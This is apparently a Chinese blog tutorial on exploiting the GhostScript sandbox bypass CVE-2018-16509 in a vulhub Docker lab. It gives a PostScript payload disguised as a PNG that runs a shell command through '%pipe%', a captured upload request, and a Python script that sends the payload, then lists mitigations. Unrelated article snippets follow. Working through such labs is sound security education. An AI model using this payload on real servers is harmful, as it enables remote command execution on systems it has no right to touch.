Python 渗透测试:GhostScript 沙箱绕过.(CVE-2018-16509)

什么是 GhostScript 沙箱绕过

GhostScript 沙箱是一种安全机制,用于在受控环境中运行 GhostScript 解释器,以防止恶意代码的执行。GhostScript 是一个广泛使用的 PDF 和 PostScript 解释器,通常用于在服务器上处理和渲染这些文件格式。Tavis Ormandy 通过公开邮件列表,再次指出 GhostScript 的安全沙箱可以被绕过,通过构造恶意的图片内容,将可以造成命令执行、文件读取、文件删除等。


目录:

什么是 GhostScript 沙箱绕过​​​​​​​

Python 编写渗透测试基础:

GhostScript 沙箱通常包括以下特性:

靶场的开启:

(1)靶场的搭建:

(2)查看目录:

(3)启用 vulhub 漏洞:

(4)进行浏览:主机的 8080 端口.

GhostScript 沙箱绕过:

(1)漏洞的利用方法(命名为poc.png文件):

运行的结果:

(2)上传一个文件时,进行抓包 对数据包分析:

(3)编写代码执行:

防范 GhostScript 沙箱绕过的主要措施包括:


Python 编写渗透测试基础:

(1)漏洞发现和利用走的是什么协议.(2)编写难度是根据协议和探针利用复现复杂程度决定的.例如:mysql类型的漏洞复现漏洞 大部分都是在mysql里面进行python写这个漏洞利用 是不是也要用到mysql的库来进行连接 后续操作 复现一致

GhostScript 沙箱通常包括以下特性:

(1)文件系统访问控制:限制 GhostScript 只能访问指定的目录,防止访问敏感文件。(2)网络访问控制:GhostScript 的网络访问能力,防止它连接到恶意服务器。(3)进程控制:GhostScript 创建新进程的能力,防止它执行任意命令。(4)资源限制:限制 GhostScript 使用 CPU、内存等系统资源的上限,防止资源耗尽。

靶场的开启:

(1)靶场的搭建:Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客


(2)查看目录:

(1)cd vulhub(2)ls


(3)启用 vulhub 漏洞:

(1)cd ghostscript                       // 切换到对应的漏洞目录.(2)cd CVE-2018-16509               // 切换到对应的漏洞版本.(3)docker-compose build           // 建立容器(4)docker-compose up -d           // 启用漏洞环境.(5)docker ps                      // 查看环境运行状态


(4)进行浏览:主机的 8080 端口.


GhostScript 沙箱绕过:

(1)漏洞的利用方法(命名为poc.png文件):

构成这个数据包,里面的代码创建一个新的文件 /tmp/success
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

 

运行的结果:


(2)上传一个文件时,进行抓包 对数据包分析:

POST / HTTP/1.1
Host: 172.16.10.19:8080
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://172.16.10.19:8080/
Cookie: csrftoken=ZvnmdubDr9oBu7WKiG5bIWHZTtgDvTCBIz39QfaMx2YPBmueHxmcpPVQAvTrWCPS; sessionid=3tyha7nkq68bx29fxjcfs57w2730jpxr
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------23194234122378
Content-Length: 410-----------------------------23194234122378
Content-Disposition: form-data; name="file_upload"; filename="poc.png"
Content-Type: image/png%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops
-----------------------------23194234122378--


(3)编写代码执行:

import requests             # 导入模块url='http://172.16.10.19:8080/'# 定义一个变量来装数据包中头部.
head={      'User-Agent':'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','Accept-Language': 'zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3','Accept-Encoding': 'gzip, deflate','Referer': 'http://172.16.10.19:8080/','Cookie': 'csrftoken=ZvnmdubDr9oBu7WKiG5bIWHZTtgDvTCBIz39QfaMx2YPBmueHxmcpPVQAvTrWCPS; sessionid=3tyha7nkq68bx29fxjcfs57w2730jpxr','Connection': 'close','Content-Type': 'multipart/form-data; boundary=---------------------------72831945316609','Content-Length': '410',
}# 定义一个变量来装数据包中内容
data="""-----------------------------72831945316609
Content-Disposition: form-data; name="file_upload"; filename="poc.png"
Content-Type: image/png%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops-----------------------------72831945316609--"""r=requests.post(url,data=data,headers=head).text
# 上传的链接 + 上传的内容 + 数据包的头部
# .text 属性用于获取响应的文本内容,然后赋值r
print(r)
# 打印 


防范 GhostScript 沙箱绕过的主要措施包括:

(1)持续更新和修复 GhostScript:及时修复 GhostScript 中发现的安全漏洞,降低被利用的风险。使用最新版本的 GhostScript,其中包含了更多的安全防护措施。(2)加强沙箱配置:仔细配置沙箱的各项限制,确保其能够有效阻挡各种攻击手段。定期审核和调整沙箱配置,以应对新出现的绕过技术。(3)监控和检测异常行为:监控 GhostScript 在沙箱中的行为,及时发现可疑活动。建立异常行为检测机制,如异常资源消耗、非法文件访问等。(4)多层防御:不仅依赖 GhostScript 沙箱,还应该结合其他安全措施,如Web应用防火墙、入侵检测系统等。形成深度防御体系,提高整体安全性。(5)安全审计和渗透测试:定期对 GhostScript 沙箱进行安全审计,发现并修复存在的漏洞。进行渗透测试,模拟攻击者的行为,验证沙箱的防御能力。(6)安全意识培训:提高运维人员对 GhostScript 安全性的认知,培养他们的安全意识。让运维人员掌握沙箱配置、监控和事件响应的相关知识。

   

    

    

学习链接:第159天:安全开发-Python-协议库爆破&FTP&SSH&Redis&SMTP&MYSQL等_哔哩哔哩_bilibili

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/839351.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

14.js数组

是一种复杂数据类型,有序的数据集合 数组一般存放多个个例的不同数据,对象一般存放一个个例的不同信息 数组创建 (1)字面量创建 var 数组名[ ] (2)内部构造函数创建 var 数组名new Array() 创建指定长度的数…

《网关微服务技术架构:构建高效可扩展的服务网关》

随着微服务架构的流行,网关微服务作为微服务架构中的重要组成部分,扮演着连接客户端与后端微服务的关键角色。本文将深入探讨网关微服务的技术架构设计与实现,以及如何构建高效可扩展的服务网关。 ### 1. 网关微服务的作用与意义 网关微服务…

iptables防火墙【☆】

一、防火墙的基础 防火墙分为硬件防火墙和软件防火墙,硬件防火墙有专门的设备:如国产华为、绿盟等,作为网关层做地址转换等安全防护。很多公司基本都会使用硬件防火墙做第一道防御,在核心业务上再添加软件防火墙提高安全性能…

heap和stack有什么区别

heap(堆)和stack(栈)在内存管理、数据结构、空间分配和释放等方面存在显著的区别。以下是对这些区别的详细解释和举例说明: 空间分配和释放: heap:空间一般由程序员手动分配和释放&#xff0c…

IP地址概述和配置

一.IP地址的概述 在计算机网络中,连接的网络设备和计算机都有唯一的地址,以此作为该计算机在internet中的唯一标识。 二.IP地址的定义 IP地址(internet protocol Address,网络协议地址)是用于表示网络节点的逻辑地址…

智能科技的新风潮:探索Web3与物联网结合

引言 随着科技的不断进步和创新,智能科技正成为新时代的主旋律。在这个充满活力和变革的时代,Web3技术与物联网的结合成为了一股新的风潮。本文将深入探讨这一新趋势,揭示Web3与物联网结合的意义、挑战和前景。 Web3技术的特点与优势 区块链…

Docker compose 的方式一键部署夜莺

官方安装文档:https://flashcat.cloud/docs/content/flashcat-monitor/nightingale-v7/install/docker-compose/ 介绍:夜莺监控是一款开源云原生观测分析工具,采用 All-in-One 的设计理念,集数据采集、可视化、监控告警、数据分析…

Go语言(Golang)的开发框架

在Go语言(Golang)的开发中,有多种开发框架可供选择,它们各自具有不同的特点和优势。以下是一些流行的Go语言开发框架,选择Go语言的开发框架时,需要考虑项目需求、团队熟悉度、社区支持、框架性能和可维护性…

3d选择模型后不能旋转什么原因?怎么解决?---模大狮模型网

在3D建模和渲染的过程中,旋转模型是常见的操作。然而,有时在选择了模型后,却发现无法进行旋转,这可能会让许多用户感到困扰。本文将探讨3D选择模型后不能旋转的可能原因,并提供相应的解决方法。 一、3D选择模型后不能旋…

Kafka中配置一个账号,权限仅支持查询所有主题信息和消费组信息

为了配置一个Kafka账号,使其具有查询所有主题的消费信息和权限组信息的权限,但没有编辑权限,你可以按照以下流程操作,并使用相应的Kafka命令行工具: 配置流程 设置认证机制 确保Kafka集群配置了SASL或SSL/TLS认证。…

若依nodejs版本过高问题解决方案

由于nodejs版本过高,可能会导致vue-cli项目运行报错。 目录 方法1:每次启动项目前,输入配置命令 方法2:修改package.js

代码随想录训练营day56 | 动态规划part17

1、647.回文子串 class Solution {public int countSubstrings(String s) {char[] chars s.toCharArray();int len chars.length;boolean[][] dp new boolean[len][len];int result 0;for (int i len - 1; i > 0; i--) {for (int j i; j < len; j) {if (chars[i] …

react中样式的书写

在 React 中&#xff0c;你可以使用 className 来指定一个 CSS 的 class。它与 HTML 的 class 属性的工作方式相同&#xff1a; <img className"avatar" /> 然后&#xff0c;你可以在一个单独的 CSS 文件中为它编写 CSS 规则&#xff1a; .avatar {border-rad…

如何使用WindowsSpyBlocker防止Windows系统被恶意监控和跟踪

关于WindowsSpyBlocker WindowsSpyBlocker是一款功能强大的Windows系统安全防护工具&#xff0c;该工具基于Go语言开发&#xff0c;WindowsSpyBlocker以一个单独的可执行程序发布&#xff0c;可以帮助广大用户防止自己的Windows系统被恶意监控和跟踪。 WindowsSpyBlocker能够利…

react中hook 函数的使用

以 use 开头的函数被称为 Hook。useState 是 React 提供的一个内置 Hook。你可以在 React API 参考 中找到其他内置的 Hook。你也可以通过组合现有的 Hook 来编写属于你自己的 Hook。 Hook 比普通函数更为严格。你只能在你的组件&#xff08;或其他 Hook&#xff09;的 顶层 调…

SpringCloud(1)-Eureka相关配置

1.新建Module-注册中心 作为注册中心 1.1配置 pom.xml <!-- 引入 eureka-server --><dependency><groupId>org.springframework.cloud</groupId><artifactId>spring-cloud-starter-netflix-eureka-server</artifactId></dependency&g…

ASP+ACCESS基于BS产品销售管理系统

2. 网页制作工具 a) 网页设计工具 网页主要使用Frontpage2003&#xff0c;Dreamweaver Mx辅助制作。 Frontpage 2003 frontpage2003是在frontpage2000基础上的网页工具。frontpage2003保留和发展了frontpage 2000的优秀功能&#xff0c;并根据用户的的要求再次增加了九大新…

如何用PLC监听消防系统485总线通讯获取火灾报警数据

本文由艺捷自动化编写&#xff0c;艺捷自动化旗下产品有艺捷自动化网站和易为二维码说明书小程序&#xff08;微信&#xff09; 前言&#xff0c;先来说一下为什么会有这么一个奇怪的应用。在一个自动化系统改造升级项目中&#xff0c;甲方要求把消防的画面加到他们的后台上。…

C++哪些函数不能被声明为虚函数

在C中&#xff0c;某些函数不能被声明为虚函数。下面详细解释哪些函数不能被声明为虚函数&#xff0c;并通过代码示例进行说明。 C哪些函数不能被声明为虚函数 不能声明为虚函数的函数示例代码及解释一、构造函数不能是虚函数二、静态成员函数不能是虚函数三、友元函数不能是虚…

反转链表-力扣

该题使用虚拟头节点来做在思考的时候稍微有点复杂&#xff0c;但与从头节点开始&#xff0c;利用一个cur节点来反转流程是一样的&#xff0c;只需将dummyhead->next 当作是 cur 来操作即可。代码如下&#xff1a; /*** Definition for singly-linked list.* struct ListNod…